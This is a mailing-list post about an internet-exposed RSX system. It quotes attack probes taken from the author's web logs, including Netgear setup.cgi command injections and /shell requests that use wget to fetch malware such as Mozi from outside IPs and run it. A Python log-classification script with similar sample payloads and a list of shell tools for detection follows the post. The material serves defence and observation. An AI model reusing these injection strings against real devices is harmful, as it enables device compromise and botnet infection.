[Info-vax] Anti-virus ?

Johnny Billquist bqt at softjar.se
Mon Aug 14 07:12:32 EDT 2023


On 2023-08-12 12:59, plugh wrote:
> On Saturday, August 12, 2023 at 3:41:28 AM UTC-7, Johnny Billquist wrote:
>> On 2023-08-11 19:35, Simon Clubley wrote:
>>> Oh, and BTW, judging by the fact Eisner has needed to be rebooted multiple
>>> times over the years due to various services locking up presumably due to
>>> attacks, I have little confidence that VMS in general would be robust
>>> within an actively hostile environment.
>> I think you are misinterpreting some data, as well as making some
>> assumptions that I don't think are correct.
>>
>> By the way, I have an RSX system publicly on the internet, and it's
>> totally without firewalls, and on 24/7. Mainly to actually harden it.
>> But it's basically running stable without any issues since many years.
>>
>> So much for "hostile environment" being such a big problem. (Although I
>> should admit that I don't have some of the fancy services that are easy
>> to exploit...)
>>
>> Johnny
> 
> It's that last part that is quite important these days. It's all about services now, as communication is so important. So much of this security stuff was known by Digital, such knowledge has simply been left to rot.

Oh. But it's not that I don't have any services... I do have some. But I 
guess it's a combination of me really into writing services that ever 
execute something passed in, with the assumption that it will look fine. 
I completely abhor the REST paradigm. It's such a poor idea from the 
start. (I don't start ranting about people who embrace it...)
The other part being that RSX is such an odd system to start with that 
pretty close to nobody even cares to try and figure out how to actually 
exploit anything. They are just running various scripts and tools that 
try to exploit usual, well known issues in various services.

It's actually a very good way of finding out what issues are the most 
common ones. I get plenty of probes for things in wordpress for example. 
So that one seems popular (and bad). Netgear seems to also have some 
popular exploits. Then apparently just badly set up CGI stuff in general.

Examples:

. GET /wp-login.php

(seems to be just lots of these probing if wordpress is running on the 
host, so lots of variations on this one...)


. GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http:/60.189.27.88:43788/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

(I think we can safely assume that 60.189.27.88 isn't an official site 
of netgear configurations...)


. GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws

(Do people really set up their web servers to have shell as a CGI???)


Those are just a few examples from just a couple of hours of logs on my 
RSX machine...

   Johnny
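The kind of log triage Johnny describes (sorting a few hours of probes into "wordpress scan", "netgear setup.cgi command injection", "shell as CGI") is easy to automate. The following is an added example, not code from the original post: it parses common-log-format lines, URL-decodes the request target, and tags each request by the probe family. The sample log lines are constructed for the example and use documentation-range IPs, not the addresses from the post; the tag names and the `SHELL_RE` token list are the example's own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample access-log lines (common log format). The IPs are
# from documentation ranges (RFC 5737), not the scanners seen in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Aug/2023:06:01:12 +0000] "GET /wp-login.php HTTP/1.1" 404 162
203.0.113.7 - - [14/Aug/2023:06:01:13 +0000] "GET /wp-admin/ HTTP/1.1" 404 162
198.51.100.9 - - [14/Aug/2023:06:05:40 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://198.51.100.9/x.sh+-O+/tmp/x;sh+x&curpath=/&currentsetting.htm=1 HTTP/1.1" 404 162
198.51.100.10 - - [14/Aug/2023:06:07:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+198.51.100.10/j;sh+/tmp/j HTTP/1.1" 404 162
192.0.2.5 - - [14/Aug/2023:06:09:00 +0000] "GET /index.html HTTP/1.1" 200 1043
"""

# Common log format: ip ident user [ts] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Shell command names that have no business inside an ordinary query
# string, matched only at the start of a shell "word" (after ; & | ` or
# whitespace). Assumption for the example; extend to taste.
SHELL_RE = re.compile(r'(?:^|[;&|`\s])(?:wget|curl|sh|bash|rm|chmod)\b')


def parse_line(line):
    """Split one CLF line into fields plus a decoded path/query view."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parts.query
    # '+' and %XX are decoded so "rm+-rf" is seen as "rm -rf"
    rec["decoded_query"] = unquote_plus(parts.query)
    rec["params"] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return rec


def classify(rec):
    """Return the list of probe tags that apply to one parsed request."""
    tags = []
    path = rec["path"].lower()
    # WordPress discovery: login page, admin area, XML-RPC endpoint
    if path.startswith("/wp-") or path.endswith("/xmlrpc.php"):
        tags.append("wordpress-probe")
    # Netgear-style setup.cgi with todo=syscmd carries an OS command in cmd=
    if path == "/setup.cgi" and rec["params"].get("todo") == "syscmd":
        tags.append("netgear-setup.cgi-syscmd")
    # A request for /shell with a command string is the "shell as CGI" probe
    if path == "/shell":
        tags.append("shell-as-cgi")
    # Generic: command separators plus shell tool names in the query
    if ";" in rec["decoded_query"] and SHELL_RE.search(rec["decoded_query"]):
        tags.append("shell-commands-in-query")
    return tags


def scan(log_text):
    """Parse every line and keep only the requests that got at least one tag."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["ip"], rec["path"], tags))
    return hits


def summarize(hits):
    """Count how often each probe family appears, like the post's tally."""
    counter = Counter()
    for _, _, tags in hits:
        counter.update(tags)
    return dict(counter)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, path, tags in found:
        print(f"{ip:15} {path:15} {','.join(tags)}")
    print(summarize(found))
```

The decoded-query check is deliberately separate from the path-based rules: the path rules name the two families the post calls out, while the `;` plus shell-tool rule catches the same injection pattern aimed at any other CGI endpoint. Run it over a real access log by replacing `SAMPLE_LOG` with the file contents; the 404 status on the probe lines is worth keeping in the output, since a 200 on one of these would be the thing to investigate.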